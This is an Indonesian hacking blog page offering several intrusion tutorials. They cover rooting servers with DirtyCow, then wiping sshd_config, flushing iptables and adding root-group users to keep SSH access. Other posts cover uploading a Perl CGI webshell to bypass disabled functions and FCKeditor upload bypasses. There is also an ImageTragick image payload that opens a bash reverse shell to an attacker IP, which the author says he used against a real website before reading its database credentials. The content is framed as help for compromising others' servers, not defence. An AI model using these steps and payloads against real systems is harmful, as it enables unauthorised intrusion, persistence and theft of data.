LinuxSec Exploit

Nothing is Ever Locked

Hacking

Mendapatkan Akses SSH Setelah Rooting Server

by Jack Wilder 4 Comments

Haloo.. kali ini saya mau berbagi sedikit tips saja barangkali ada yang belum tau. Biasanya yang pernah rooting server dengan localroot dirtyc0w sering pas sudah eskalasi, add user dan ganti password ternyata tidak bisa masuk ke ssh karena port ssh yang diganti, atau password auth dimatikan (sysadmin server tersebut login menggunakan auth key). Ada juga kasus dimana proses privilege escalation langsung memanggil tty dengan id root, namun ketika menambahkan user tidak bisa karena akses ke perintah seperti passwd iptables, dll dibatasi.

Oke kita bahas dulu kasus pertama.
dirty cow exploit – eksekusi localroot – ganti user dan password – tidak bisa masuk ke ssh.
Kemungkinan nya ada dua, tidak diijinkan login dengan password , atau memang ssh hanya bisa diakses melalui ip tertentu saja (pengaturan iptables).
Trik nya :

su firefat
cd /etc/ssh/
rm sshd_config
wget https://raw.githubusercontent.com/linuxsec/pentest/master/sshd.txt -O sshd_config
iptables -F
service ssh restart

Perintah diatas akan menghapus konfigurasi ssh yang dilakukan sysadmin dan mengembalikannya ke pengaturan default dimana password login diijinkan dan port nya di port 22. iptables -F adalah melakukan flushing iptables. Hal ini untuk menghapus semua rule iptables yang ada. Sehingga misalnya rule awal hanya mengijinkan ip tertentu login ke ssh, sekarang kita bisa login ke ssh dari ip kita.
Yang pertama diatas adalah yang kasus paling gampang nya. Nah yang kedua ini lumayan banyak juga
dirty cow exploit – eksekusi localroot – ganti user dan password – tidak bisa masuk ke ssh – /bin/su denied
Nah kalau yang ini, kita gunakan trik berikut.
Kita lakukan eskalasi server dengan localroot yang langsung memanggil tty dengan id root.
Sehingga proses nya menjadi
exploit – run – id root
log :

./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 30768
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
thread stopped
thread stopped
[email protected] [/home/bugs/public_html/]#

karena id kita sekarang root kita tinggal mengikuti perintah di kasus pertama. Reset sshd config, flush iptables, add user setara root.
Nah kasus yang ketiga
exploit – tty dengan id root – tidak bisa menjalankan perintah passwd, iptables dan perintah lainnya.
Hal ini kemungkinan akses ke perintah sistem dibatasi saat kita menggunakan tty.
Log :

[email protected] [/root]# /usr/sbin/useradd kontol -g root -d /home/kontol
/usr/sbin/useradd kontol -g root -d /home/kontol
[email protected] [/root]# passwd kontol
passwd root
[email protected] [/root]#

yup, prompt password tidak mau terpanggil.
Ini dikarenakan akses di tty dibatasi. bahkan meski memiliki id root kita tidak bisa menjalankan perintah iptables.
Trik yang saya coba dan work :

cd ~
ssh-keygen -t rsa
cp /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
ssh [email protected]

Kita gunakan akses ssh menggunakan auth key. Kenapa di localhost, kenapa tidak langsung pakai auth key dari server kita ? Disini saya asumsikan firewall server target aktif dan hanya mengijinkan akses ssh dari ip tertentu saja.
Setelah add ssh key, berikut log nya :

[email protected] [~]# ssh [email protected]
ssh [email protected]
Attempting to create directory /root/perl5
[email protected] [~]#

Memang terlihat sama namun yang pertama adalah tty, dan yang kedua adalah ssh shell.
Sekarang karena yang kita punya bukan tty lagi seharusnya limit atau batasan perintah seperti tidak bisa command iptables, tidak bisa command passwd sudah tidak ada. Selanjutnya tinggal ikuti ara paling atas .
Sekian tutorial kali ini, semoga bermanfaat.

Bypass Disabled Functions Dengan Perl CGI Webshell

by Jack Wilder 1 Comment

Sebenernya ini trik lama banget ya. Cuman berhubung masih banyak yang belum tau jadi coba share aja barangkali ada yang mau baca.

Pernah gak nemu server yang disabled functionnya banyak banget.
Yang paling parah kalau fungsi exec nya di disable.
Di beberapa server “tua” bisa di bypass dengan trik add php.ini dan menambahkan value disable function ke “off”. Sayangnya di server sekarang trik bypass seperti itu kadang tidak berjalan.
Nah kita bisa membypass nya dengan CGI Shell.
Download CGI Shell
pass : jkt48
Nah selanjutnya upload shell tersebut di web target.
Biar gampang buat direktori baru aja lalu upload shell cgi nya disitu.
Selanjutnya buat file .htaccess di folder tempat cgi shell tadi dan isinya :
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddType application/x-httpd-cgi .pl
AddHandler server-parsed .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
Setelah itu buka shell nya.
Masukkan password : jkt48
Sekarang kalian bisa menjalankan perintah linux seperti biasa meskipun shell exec di disable.
Nah sebagai tambahan, untuk bypass symlink bisa baca artikel berikut :
Simple Bypass Internal Server Error Symlink 2016
Untuk bypass config bisa baca disini :
Trik Bypass Config
Oke sekian tutorial kali ini, semoga bermanfaat.

Get Root WHM via WHMCS Config Symlink 2016

by Jack Wilder 1 Comment

Yoo! Kali ini kita akan share tutorial mendapatkan akses WHM root dari WHMCS Config Symlink 2016. Langsung saja ke tutorial daripada kelamaan. Haha..
Tool

Intinya sih cari config dari whmcs nya “configuration.php” pinter” aja cari tempatnya ^^

Langsung liat aja videonya

Oke sekian. Kalo ada pertanyaan komen aja.

FCKeditor Bypass Shell Upload With Burp Suite Intercept

by Jack Wilder 9 Comments

Kali ini saya akan share cara melakukan bypass shell upload pada web yang menggunakan FCKeditor. Nah biasanya kan banyak tuh yang share cara deface pake fckeditor, tapi rata rata yang diupload cuma file txt paling mentok ya html. Jadi gak bisa upload php. Pake tamper data juga gagal. Nah disini saya akan share cara bypass uploadnya sehingga kita bisa mengupload file .php . [Read more…] about FCKeditor Bypass Shell Upload With Burp Suite Intercept

Reverse Shell From ImageTragick Exploitation

by Jack Wilder 14 Comments

Hmm.. sebenarnya exploit ini sudah booming sekitar tigabulan yang lalu. Namun beberapa hari kemarin kembali rame ketika orang orang share berita tentang mas Herdian Nugraha yang mendapatkan 25juta ruplah dari Tokopedia dan Bukalapak karena menemukan bug ini di situs mereka. Saya pun penasaran dan setelah kemarin ada yang meretas 1CAK, saya mencoba exploit tersebut di situs 1CAK.com ternyata sukses ( sekarang bug nya juga sudah di patch ). Lalu bagaimana sebenarnya langkah langkah exploit ini ?

ImageMagick sendiri adalah sebuah perangkat lunak grafis yang gratis. Kemampuannya antara lain mampu membuat, memodifikasi dan menampilkan gambar-gambar bitmap serta mampu membaca, melakukan konversi dan menulis ke dalam berbagai format gambar yang berbeda.
Oke langsung saja ke langkah langkahnya. Disini saya harap kalian sudah menyiapkan vps atau bisa juga ip statis karena akan kita gunakan untuk mendapatkan reverse shell.
Sekarang kita buat sebuah file dengan isi berikut :

push graphic-context
viewbox 0 0 840 780
fill ‘url(https://127.0.0.0/oops.jpg”; bash -i >&
/dev/tcp/198.23.158.687/6969 0>&1; touch “hello)’
pop graphic-context

Karena 1cak hanya mengijinkan file bertipe jpg dan png, maka save file tersebut dengan format jpg/png. Sesuaikan juga ip dan port listening nya.
Selanjutnya dari vps kita masukkan command berikut :

nc -lvp 6969

Lalu upload file payload yang kita buat sebelumnya. Dalam kasus ini saya mencoba mengupload melalui fitur upload meme di 1cak.
Saya mendapatkan error berikut :
Namun disaat yang sama kita sudah mendpatkan akses shell interaktif di vps kita.
Saya mencoba membaca file konfigurasi di direktori inc dan login database. Ternyata bisa juga.
Nah sampai disini saja tutorialnya kalo diterusin malah jadi ngajarin yang engga engga.
Nb :
Untuk mendapatkan tampilan bash interaktif yang lebih menarik masukkan perintah berikut :

python -c “import pty; pty.spawn(‘/bin/bash’)”

Oke sekian tutorial kali ini, semoga bermanfaat.

Powered by WordPress and Genesis Framework. Style by LinuxSec.